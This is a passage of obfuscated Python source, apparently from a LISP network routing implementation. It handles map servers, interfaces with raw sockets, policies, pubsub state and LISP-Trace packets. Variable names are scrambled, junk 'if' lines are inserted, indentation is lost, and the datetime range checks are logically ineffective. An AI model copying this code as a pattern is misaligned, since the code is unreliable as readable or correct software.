self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 16 - 16: I11i - I11i + oO0o + iII111i . OoO0O00
if 96 - 96: iIii1I11I1II1 + iII111i + I1Ii111 % I1IiiI * OOooOOo
if 46 - 46: I1ii11iIi11i % Oo0Ooo * OOooOOo
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 64 - 64: I1ii11iIi11i
try :
ooo0o0 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = ooo0o0 [ 2 ]
except :
return
if 17 - 17: II111iiii + Ii1I - o0oOOo0O0Ooo * II111iiii / Oo0Ooo / II111iiii
if 82 - 82: i11iIiiIii * OoOoOO00 . i1IIi + IiII * ooOoO0o
if 75 - 75: iIii1I11I1II1 / IiII / II111iiii . I11i
if 23 - 23: OOooOOo . ooOoO0o - iII111i % Ii1I . I1ii11iIi11i + IiII
if 81 - 81: I11i
if 5 - 5: OoooooooOO
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 5 - 5: iII111i + oO0o % O0 . OoooooooOO + i1IIi
if 55 - 55: I1ii11iIi11i
IiI = OO0oo0o0 [ self . a_record_index ]
if ( IiI != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( IiI )
self . insert_ms ( )
if 34 - 34: OoO0O00 * iIii1I11I1II1 . iIii1I11I1II1
if 39 - 39: o0oOOo0O0Ooo
if 29 - 29: Oo0Ooo . Oo0Ooo * OoO0O00 % Ii1I - ooOoO0o
if 67 - 67: I1IiiI % O0 + I1IiiI * I1Ii111 * OoOoOO00 * II111iiii
if 79 - 79: I1IiiI
if 37 - 37: I1Ii111 + Ii1I
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 50 - 50: i11iIiiIii
for IiI in OO0oo0o0 [ 1 : : ] :
OO0O00o0 = lisp_address ( LISP_AFI_NONE , IiI , 0 , 0 )
oO00000oOO = lisp_get_map_server ( OO0O00o0 )
if ( oO00000oOO != None and oO00000oOO . a_record_index == OO0oo0o0 . index ( IiI ) ) :
continue
if 57 - 57: O0 * i1IIi - I1IiiI
oO00000oOO = copy . deepcopy ( self )
oO00000oOO . map_server . store_address ( IiI )
oO00000oOO . a_record_index = OO0oo0o0 . index ( IiI )
oO00000oOO . last_dns_resolve = lisp_get_timestamp ( )
oO00000oOO . insert_ms ( )
if 48 - 48: IiII / iIii1I11I1II1
if 20 - 20: oO0o / OoooooooOO
if 95 - 95: Oo0Ooo . i11iIiiIii
if 50 - 50: iII111i . i11iIiiIii - i1IIi
if 24 - 24: i11iIiiIii % iII111i . oO0o
iIi1II1IiI1I = [ ]
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
if ( self . dns_name != oO00000oOO . dns_name ) : continue
OO0O00o0 = oO00000oOO . map_server . print_address_no_iid ( )
if ( OO0O00o0 in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( oO00000oOO )
if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
for oO00000oOO in iIi1II1IiI1I : oO00000oOO . delete_ms ( )
if 34 - 34: I1ii11iIi11i % ooOoO0o / II111iiii * O0 % OOooOOo
if 9 - 9: I1ii11iIi11i / I1ii11iIi11i - OOooOOo . iIii1I11I1II1
def insert_ms ( self ) :
III = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ III ] = self
if 33 - 33: I1IiiI + oO0o % I1IiiI / iII111i - ooOoO0o - i11iIiiIii
if 39 - 39: i11iIiiIii / oO0o
def delete_ms ( self ) :
III = self . ms_name + self . map_server . print_address ( )
if ( III not in lisp_map_servers_list ) : return
lisp_map_servers_list . pop ( III )
if 71 - 71: I1Ii111 * iIii1I11I1II1 - I1Ii111
if 87 - 87: I1IiiI / Ii1I
if 54 - 54: OoooooooOO / Ii1I
class lisp_interface ( object ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 26 - 26: o0oOOo0O0Ooo + OoO0O00
if 59 - 59: Ii1I * IiII
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 64 - 64: ooOoO0o . Oo0Ooo - OoOoOO00
if 66 - 66: OoOoOO00
def get_instance_id ( self ) :
return ( self . instance_id )
if 83 - 83: OOooOOo . IiII
if 98 - 98: i11iIiiIii
def get_socket ( self ) :
return ( self . raw_socket )
if 74 - 74: iIii1I11I1II1 * O0 + OOooOOo . o0oOOo0O0Ooo
if 17 - 17: I1Ii111
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 59 - 59: OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
if 3 - 3: iIii1I11I1II1 + iIii1I11I1II1 + OoO0O00
def set_socket ( self , device ) :
I111 = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
I111 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
I111 . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
I111 . close ( )
I111 = None
if 59 - 59: iII111i
self . raw_socket = I111
if 7 - 7: o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
def set_bridge_socket ( self , device ) :
I111 = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
I111 = I111 . bind ( ( device , 0 ) )
self . bridge_socket = I111
except :
return
if 65 - 65: I1Ii111 + OOooOOo
if 97 - 97: oO0o % OoOoOO00 * oO0o % II111iiii + iIii1I11I1II1
if 11 - 11: ooOoO0o . o0oOOo0O0Ooo
if 94 - 94: ooOoO0o . oO0o * OoooooooOO % oO0o
class lisp_datetime ( object ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 77 - 77: ooOoO0o % I1IiiI
if 26 - 26: o0oOOo0O0Ooo
def valid_datetime ( self ) :
o0o0OO = self . datetime_name
if ( o0o0OO . find ( ":" ) == - 1 ) : return ( False )
if ( o0o0OO . find ( "-" ) == - 1 ) : return ( False )
ii1iiii1i1II1 , oOOOOOo00 , i1O0oOO , time = o0o0OO [ 0 : 4 ] , o0o0OO [ 5 : 7 ] , o0o0OO [ 8 : 10 ] , o0o0OO [ 11 : : ]
if 65 - 65: OOooOOo * o0oOOo0O0Ooo - I1Ii111 % O0 / I1ii11iIi11i + O0
if ( ( ii1iiii1i1II1 + oOOOOOo00 + i1O0oOO ) . isdigit ( ) == False ) : return ( False )
if ( oOOOOOo00 < "01" and oOOOOOo00 > "12" ) : return ( False )
if ( i1O0oOO < "01" and i1O0oOO > "31" ) : return ( False )
if 97 - 97: II111iiii + i11iIiiIii + OoooooooOO . iII111i
I1I11Ii , OoI1 , oooO0OOO0OoO = time . split ( ":" )
if 84 - 84: OoO0O00 . oO0o * OoO0O00 - IiII
if ( ( I1I11Ii + OoI1 + oooO0OOO0OoO ) . isdigit ( ) == False ) : return ( False )
if ( I1I11Ii < "00" and I1I11Ii > "23" ) : return ( False )
if ( OoI1 < "00" and OoI1 > "59" ) : return ( False )
if ( oooO0OOO0OoO < "00" and oooO0OOO0OoO > "59" ) : return ( False )
return ( True )
if 24 - 24: O0 * OOooOOo . OoO0O00 + iII111i + i1IIi + oO0o
if 57 - 57: OOooOOo * OOooOOo
def parse_datetime ( self ) :
oOOoo0o0OOOo = self . datetime_name
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( "-" , "" )
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( ":" , "" )
self . datetime = int ( oOOoo0o0OOOo )
if 94 - 94: II111iiii % I1Ii111 . Ii1I / OoOoOO00 - OoO0O00 - OoO0O00
if 13 - 13: I11i + i11iIiiIii . O0 - iII111i
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
if 48 - 48: OoO0O00 * OOooOOo / iII111i
if 90 - 90: I1IiiI * i11iIiiIii . OOooOOo / o0oOOo0O0Ooo
def print_datetime ( self ) :
return ( self . datetime_name )
if 82 - 82: Oo0Ooo
if 50 - 50: I1Ii111 * OOooOOo * OoOoOO00 / OoooooooOO % iII111i
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 80 - 80: I1Ii111
if 35 - 35: Ii1I . O0 % i11iIiiIii * oO0o - OoooooooOO
def past ( self ) :
return ( self . future ( ) == False )
if 87 - 87: iII111i * ooOoO0o - OOooOOo . O0
if 20 - 20: OoOoOO00 - IiII
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 9 - 9: O0 . I11i % I1ii11iIi11i * oO0o - I1Ii111 - i1IIi
if 66 - 66: II111iiii / Oo0Ooo
def this_year ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == O000oo )
if 45 - 45: IiII + I1IiiI * I1Ii111
if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
def this_month ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == O000oo )
if 88 - 88: o0oOOo0O0Ooo % OoO0O00
if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
def today ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == O000oo )
if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
if 97 - 97: iIii1I11I1II1 + O0
if 41 - 41: OoOoOO00 - II111iiii
if 46 - 46: OOooOOo
if 73 - 73: iII111i - IiII + II111iiii
if 58 - 58: Oo0Ooo % I1IiiI
class lisp_policy_match ( object ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 78 - 78: iII111i / iIii1I11I1II1 * IiII . ooOoO0o / I1Ii111 % I11i
if 14 - 14: II111iiii % iIii1I11I1II1 - I1IiiI % i11iIiiIii . OOooOOo * I1ii11iIi11i
class lisp_policy ( object ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 12 - 12: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . OoOoOO00
if 73 - 73: I1ii11iIi11i * i1IIi * Oo0Ooo / O0
def match_policy_map_request ( self , mr , srloc ) :
for IiIIIIi11ii in self . match_clauses :
iIIiiIi = IiIIIIi11ii . source_eid
IIiIIiiiiI = mr . source_eid
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
if 1 - 1: iII111i * OOooOOo + II111iiii / Ii1I . I1ii11iIi11i
iIIiiIi = IiIIIIi11ii . dest_eid
IIiIIiiiiI = mr . target_eid
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
if 61 - 61: oO0o % OoOoOO00 % ooOoO0o . I1Ii111 / OoO0O00
iIIiiIi = IiIIIIi11ii . source_rloc
IIiIIiiiiI = srloc
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
oOO0O00o0O0 = IiIIIIi11ii . datetime_lower
ii11IIiI1iIi = IiIIIIi11ii . datetime_upper
if ( oOO0O00o0O0 and ii11IIiI1iIi and oOO0O00o0O0 . now_in_range ( ii11IIiI1iIi ) == False ) : continue
return ( True )
if 81 - 81: II111iiii - II111iiii * o0oOOo0O0Ooo
return ( False )
if 95 - 95: I1Ii111 - OoooooooOO
if 99 - 99: OoooooooOO % IiII . I11i + OoooooooOO
def set_policy_map_reply ( self ) :
o00oo = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( o00oo ) : return ( None )
if 21 - 21: I11i . O0 * OoooooooOO + ooOoO0o * oO0o % i11iIiiIii
iIIiI11 = lisp_rloc ( )
if ( self . set_rloc_address ) :
iIIiI11 . rloc . copy_address ( self . set_rloc_address )
IiI = iIIiI11 . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( IiI ) )
if 30 - 30: ooOoO0o * I1Ii111 + OoO0O00
if ( self . set_rloc_record_name ) :
iIIiI11 . rloc_name = self . set_rloc_record_name
ooO0o = blue ( iIIiI11 . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( ooO0o ) )
if 30 - 30: Ii1I / iII111i * Ii1I
if ( self . set_geo_name ) :
iIIiI11 . geo_name = self . set_geo_name
ooO0o = iIIiI11 . geo_name
iI1IIi1Ii = "" if ( ooO0o in lisp_geo_list ) else "(not configured)"
if 70 - 70: OoOoOO00
lprint ( "Policy set-geo-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if 11 - 11: OoOoOO00 * OoOoOO00 % I11i
if ( self . set_elp_name ) :
iIIiI11 . elp_name = self . set_elp_name
ooO0o = iIIiI11 . elp_name
iI1IIi1Ii = "" if ( ooO0o in lisp_elp_list ) else "(not configured)"
if 21 - 21: ooOoO0o . i11iIiiIii / IiII . i1IIi + OoooooooOO
lprint ( "Policy set-elp-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if 18 - 18: ooOoO0o - I11i - I1Ii111
if ( self . set_rle_name ) :
iIIiI11 . rle_name = self . set_rle_name
ooO0o = iIIiI11 . rle_name
iI1IIi1Ii = "" if ( ooO0o in lisp_rle_list ) else "(not configured)"
if 81 - 81: IiII - Ii1I % i1IIi
lprint ( "Policy set-rle-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if 48 - 48: Ii1I + I11i % iIii1I11I1II1 + ooOoO0o + ooOoO0o + OoO0O00
if ( self . set_json_name ) :
iIIiI11 . json_name = self . set_json_name
ooO0o = iIIiI11 . json_name
iI1IIi1Ii = "" if ( ooO0o in lisp_json_list ) else "(not configured)"
if 7 - 7: O0 + II111iiii
lprint ( "Policy set-json-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if 44 - 44: OOooOOo + i11iIiiIii - I1Ii111 + ooOoO0o
return ( iIIiI11 )
if 92 - 92: O0 . iIii1I11I1II1 % iIii1I11I1II1 % OoO0O00 - i11iIiiIii - iII111i
if 76 - 76: OoO0O00 . II111iiii / I1ii11iIi11i
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 15 - 15: OoOoOO00 . O0 + iII111i + I1IiiI . ooOoO0o + iIii1I11I1II1
if 2 - 2: I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
class lisp_pubsub ( object ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
self . eid_prefix = None
if 84 - 84: I11i . oO0o + ooOoO0o
if 75 - 75: I1Ii111
def add ( self , eid_prefix ) :
self . eid_prefix = eid_prefix
O0O00O = self . ttl
o0Ooo0Oooo0o = eid_prefix . print_prefix ( )
if ( o0Ooo0Oooo0o not in lisp_pubsub_cache ) :
lisp_pubsub_cache [ o0Ooo0Oooo0o ] = { }
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
iIiI1IIi1Ii1i = lisp_pubsub_cache [ o0Ooo0Oooo0o ]
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
O0Ooo0iII111III = "Add"
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
O0Ooo0iII111III = "Replace"
del ( iIiI1IIi1Ii1i [ self . xtr_id ] )
if 94 - 94: Ii1I
iIiI1IIi1Ii1i [ self . xtr_id ] = self
if 82 - 82: OOooOOo . OoO0O00 % II111iiii . i1IIi . OoOoOO00 - oO0o
o0Ooo0Oooo0o = green ( o0Ooo0Oooo0o , False )
oO0oO00OO00 = red ( self . itr . print_address_no_iid ( ) , False )
oOOOOOo0OO0o0oOO0 = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( O0Ooo0iII111III , o0Ooo0Oooo0o ,
oO0oO00OO00 , oOOOOOo0OO0o0oOO0 , O0O00O ) )
if 27 - 27: OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
def delete ( self , eid_prefix ) :
o0Ooo0Oooo0o = eid_prefix . print_prefix ( )
oO0oO00OO00 = red ( self . itr . print_address_no_iid ( ) , False )
oOOOOOo0OO0o0oOO0 = "0x" + lisp_hex_string ( self . xtr_id )
if ( o0Ooo0Oooo0o in lisp_pubsub_cache ) :
iIiI1IIi1Ii1i = lisp_pubsub_cache [ o0Ooo0Oooo0o ]
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
iIiI1IIi1Ii1i . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( o0Ooo0Oooo0o ,
oO0oO00OO00 , oOOOOOo0OO0o0oOO0 ) )
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
if 40 - 40: oO0o % iIii1I11I1II1 * iIii1I11I1II1 / Oo0Ooo * OoO0O00
if 61 - 61: OOooOOo
if 80 - 80: I1ii11iIi11i
if 6 - 6: I1ii11iIi11i + OOooOOo % ooOoO0o
if 65 - 65: iIii1I11I1II1 % i1IIi / I1IiiI / oO0o % ooOoO0o / I11i
if 2 - 2: I1ii11iIi11i
if 90 - 90: II111iiii * I1Ii111 . ooOoO0o - I1ii11iIi11i % I11i * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1
if 76 - 76: i11iIiiIii % I1IiiI / I11i
if 42 - 42: o0oOOo0O0Ooo . I1IiiI + I11i . OoOoOO00 - O0 / Ii1I
if 66 - 66: IiII + OoOoOO00 + I1IiiI + i1IIi + OoooooooOO % I1IiiI
if 80 - 80: iII111i / O0 % OoooooooOO / Oo0Ooo
if 75 - 75: ooOoO0o
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
if 6 - 6: O0
class lisp_trace ( object ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 92 - 92: I11i
if 76 - 76: I11i / iIii1I11I1II1 - i11iIiiIii / O0 / O0
def print_trace ( self ) :
iIiI11II = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( iIiI11II ) )
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
def encode ( self ) :
iIiIii = socket . htonl ( 0x90000000 )
Oo00oo = struct . pack ( "II" , iIiIii , 0 )
Oo00oo += struct . pack ( "Q" , self . nonce )
Oo00oo += json . dumps ( self . packet_json )
return ( Oo00oo )
if 42 - 42: iII111i % i11iIiiIii % o0oOOo0O0Ooo . O0 % iII111i
if 72 - 72: Oo0Ooo . Oo0Ooo . IiII . Oo0Ooo
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
iIiIii = socket . ntohl ( iIiIii )
if ( ( iIiIii & 0xff000000 ) != 0x90000000 ) : return ( False )
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
IiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
IiI = socket . ntohl ( IiI )
OOoOO = IiI >> 24
O000O00O0O = ( IiI >> 16 ) & 0xff
iiOOoooO = ( IiI >> 8 ) & 0xff
OOO0O00oo = IiI & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( OOoOO , O000O00O0O , iiOOoooO , OOO0O00oo )
self . local_port = str ( iIiIii & 0xffff )
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
self . nonce = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 83 - 83: OOooOOo . ooOoO0o / IiII
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
return ( True )
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
if 33 - 33: I1Ii111
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 1 - 1: IiII - iIii1I11I1II1 % OoooooooOO
if 1 - 1: o0oOOo0O0Ooo - i11iIiiIii + I11i
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
iIIiI11 , ooO0 = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( iIIiI11 == None ) :
iIIiI11 , ooO0 = rts_rloc . split ( ":" )
ooO0 = int ( ooO0 )
lprint ( "Send LISP-Trace to address {}:{}" . format ( iIIiI11 , ooO0 ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( iIIiI11 ,
ooO0 ) )
if 47 - 47: O0 + IiII + ooOoO0o + OOooOOo / OoOoOO00
if 31 - 31: oO0o * iII111i % OoOoOO00
if ( lisp_socket == None ) :
I111 = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
I111 . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
I111 . sendto ( packet , ( iIIiI11 , ooO0 ) )
I111 . close ( )
else :
lisp_socket . sendto ( packet , ( iIIiI11 , ooO0 ) )
if 80 - 80: ooOoO0o % I1ii11iIi11i % I11i . I1Ii111
if 3 - 3: ooOoO0o - Oo0Ooo
if 2 - 2: iII111i . iII111i
def packet_length ( self ) :
O0I1II1 = 8 ; o0oo0oOoo0 = 4 + 4 + 8
return ( O0I1II1 + o0oo0oOoo0 + len ( json . dumps ( self . packet_json ) ) )
if 17 - 17: OoO0O00 * OoO0O00 - OOooOOo
if 93 - 93: I1Ii111 . o0oOOo0O0Ooo . ooOoO0o
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
III = self . local_rloc + ":" + self . local_port
oOO0 = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ III ] = oOO0
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( III , oOO0 ) )
if 63 - 63: OOooOOo . oO0o * OoooooooOO + ooOoO0o / iIii1I11I1II1 + iII111i
if 45 - 45: ooOoO0o / O0 % O0 % i1IIi . I1IiiI - OoOoOO00
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
III = local_rloc_and_port
try : oOO0 = lisp_rtr_nat_trace_cache [ III ]
except : oOO0 = ( None , None )
return ( oOO0 )
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
if 43 - 43: I1IiiI - IiII - OOooOOo
if 19 - 19: I1Ii111 / I1Ii111 - i1IIi
if 99 - 99: O0
if 37 - 37: iIii1I11I1II1 / I1Ii111 + OoO0O00
if 85 - 85: ooOoO0o / I1IiiI
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if 99 - 99: i11iIiiIii - I1ii11iIi11i
if 64 - 64: IiII . OoOoOO00 . Oo0Ooo . I1Ii111 / I11i / Ii1I
if 95 - 95: iIii1I11I1II1 . Ii1I % oO0o - I11i % IiII
def lisp_get_map_server ( address ) :
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
if ( oO00000oOO . map_server . is_exact_match ( address ) ) : return ( oO00000oOO )
if 42 - 42: OoOoOO00 + oO0o * i1IIi + i11iIiiIii
return ( None )
if 25 - 25: Ii1I - Ii1I - I1ii11iIi11i / i1IIi . OoOoOO00 % Oo0Ooo
if 76 - 76: I1Ii111 / OoOoOO00
if 61 - 61: Oo0Ooo . i1IIi
if 78 - 78: i11iIiiIii
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
def lisp_get_any_map_server ( ) :
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) : return ( oO00000oOO )
return ( None )
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
if 88 - 88: i1IIi - OoOoOO00
if 66 - 66: OoooooooOO - OoooooooOO * I11i / II111iiii + oO0o / Ii1I
if 7 - 7: Ii1I / iIii1I11I1II1
if 36 - 36: iIii1I11I1II1 % i11iIiiIii
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
IiI = address . print_address ( )
iii1i = None
for III in lisp_map_resolvers_list :
if ( III . find ( IiI ) == - 1 ) : continue
iii1i = lisp_map_resolvers_list [ III ]
if 35 - 35: Oo0Ooo + I1IiiI - O0 - I1Ii111
return ( iii1i )
if 64 - 64: i1IIi * OoOoOO00 / II111iiii * oO0o
if 35 - 35: i1IIi - Ii1I - Ii1I . O0 % iII111i * iII111i
if 15 - 15: OoooooooOO . Ii1I * I1Ii111 . ooOoO0o % OoO0O00 * Oo0Ooo
if 10 - 10: iII111i + i11iIiiIii . OOooOOo % iII111i - i1IIi
if 10 - 10: iIii1I11I1II1 * i11iIiiIii - O0
if 45 - 45: oO0o % OOooOOo - IiII + o0oOOo0O0Ooo + i11iIiiIii
if 79 - 79: IiII % I1Ii111 . I1IiiI + O0 * oO0o * ooOoO0o
if ( eid == "" ) :
i111I1Ii1II1 = ""
elif ( eid == None ) :
i111I1Ii1II1 = "all"
else :
OoO0oO = lisp_db_for_lookups . lookup_cache ( eid , False )
i111I1Ii1II1 = "all" if OoO0oO == None else OoO0oO . use_mr_name
if 57 - 57: I1IiiI . Oo0Ooo - i1IIi + oO0o + OOooOOo + oO0o
if 6 - 6: OoO0O00 + OoooooooOO . I1Ii111
Ii11Ii = None
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( i111I1Ii1II1 == "" ) : return ( iii1i )
if ( iii1i . mr_name != i111I1Ii1II1 ) : continue
if ( Ii11Ii == None or iii1i . last_used < Ii11Ii . last_used ) : Ii11Ii = iii1i
if 2 - 2: i11iIiiIii
return ( Ii11Ii )
if 86 - 86: I1Ii111 + o0oOOo0O0Ooo
if 17 - 17: iIii1I11I1II1
if 32 - 32: IiII - OoOoOO00
if 88 - 88: OOooOOo - II111iiii + i1IIi * Oo0Ooo
if 48 - 48: I1Ii111 + IiII % iII111i * iII111i + I1Ii111
if 83 - 83: OoO0O00 . I11i * I1ii11iIi11i - II111iiii
if 41 - 41: OoooooooOO . OoOoOO00 * iIii1I11I1II1
if 18 - 18: IiII / I1Ii111 % i1IIi * i11iIiiIii
def lisp_get_decent_map_resolver ( eid ) :
OOOooo0OooOoO = lisp_get_decent_index ( eid )
iiiiII = str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( iiiiII , False ) , eid . print_prefix ( ) ) )
